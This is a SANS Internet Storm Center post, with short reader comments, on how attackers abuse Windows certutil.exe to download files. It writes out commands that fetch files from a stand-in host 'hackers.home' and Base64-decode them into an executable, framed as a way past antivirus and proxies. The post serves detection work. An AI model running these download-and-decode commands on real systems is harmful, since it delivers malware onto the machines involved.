Threat Level: green Handler on Duty: Rick Wanner

SANS ISC: A Suspicious Use of certutil.exe - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
A Suspicious Use of certutil.exe

The Microsoft operating system is full of command line tools that help to perform administrative tasks. Some can be easily installed, like the SysInternal suite[1] and psexec.exe, others are builtin in Windows and available to everybody. The presence of calls to such tools can help to detect suspicious behaviours. Why reinvent the wheel, if a tool can achieve what you need? I recently upgraded my hunting rules on VirusTotal to collect samples that are (ab)using the "certutil.exe" tool. The purpose of this tool is to dump and display certification authority (CA) information, manage certificates and keys. This is a command line tool that accepts a lot of parameters [2]. A classic use of certutil.exe is to easily process Base64 encoded data:

C:\Temp> certutil.exe -decode input.txt output.exe

But, it is possible to use the tool to perform an important task for attackers: To fetch data from the Internet! Indeed, many Microsoft tools are able to fetch an online file using a URL schema (ftp://, http://, etc). I presume you already know that, in every dialogue box used to open/save a file, you can provide a URL:

It is exactly the same with certutil.exe which can fetch data from the Internet. I spotted a script which uses it in this way. Here is an example of download:

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/malicious.exe" bad.exe
****  Online  ****
  000000  ...
  1056d0
CertUtil: -URLCache command completed successfully.

Interesting, the tool makes two connections to the remote web server using two different User-Agents. Here is an extract from the web server logs:

10.x.x.x - - [03/Apr/2018:21:21:11 +0200] "GET /malicious.exe HTTP/1.1" 200 1077596 "-" "Microsoft-CryptoAPI/10.0"
10.x.x.x - - [03/Apr/2018:21:21:15 +0200] "GET /malicious.exe HTTP/1.1" 200 1077540 "-" "CertUtil URL Agent”

What about the command line options?

  • "-urlcache" is used to perform URL cache management action.
  • "-f" is used to force fetching the specified URL and updating the cache.
  • "-split" is used to dump the file on disk.

Let's combine the two features: grab a Base64 encoded text file to bypass AV & proxies and decode it to easily drop a malicious exec on your target:

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe

So, no need to install a curl or wget, certutil.exe is available for this basic feature!

[1] https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
[2] https://ss64.com/nt/certutil.html

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

Xme

417 Posts
ISC Handler
Xavier,

Thanks for sharing this! This is a great example of an attacker living off the land. I have used certutil for hashing and base64 decoding for a long time and didn't realize that it had this capability.

Chris
Anonymous
Great post, thank you!

Fortunately the urlcache feature was blocked by our FW (for blacklisted domains). I was able to successfully fetch .html and .txt files from domains which were not specifically blacklisted

Adding this to our Splunk "Covert Channel" dashboard :) thanks!
Anonymous
Very cool. What's the earliest version of Windows this works on? In OS labs they often use old versions of Windows and using ftp can be cumbersome.

Please do more of these. Thanks!
Anonymous

Sign Up for Free or Log In to start participating in the conversation!